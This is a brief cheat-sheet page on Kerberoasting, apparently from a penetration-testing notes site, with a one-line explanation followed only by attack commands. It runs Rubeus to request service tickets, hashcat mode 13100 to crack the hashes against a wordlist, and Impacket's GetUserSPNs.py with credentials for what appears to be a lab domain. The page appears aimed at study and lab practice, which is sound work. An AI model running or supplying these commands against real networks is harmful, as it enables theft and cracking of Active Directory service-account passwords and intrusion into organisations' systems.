Owlglass

Kerberoasting

Kerberoasting

Kerberoasting allows a user to request a service ticket for any service with a registered SPN then use that ticket to crack the service password.

Rubeus

1
Rubeus.exe kerberoast

Then crack the hashes with hashcat

1
hashcat -m 13100 -a 0 hash.txt Pass.txt

Impacket

1
sudo python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.239.179 -request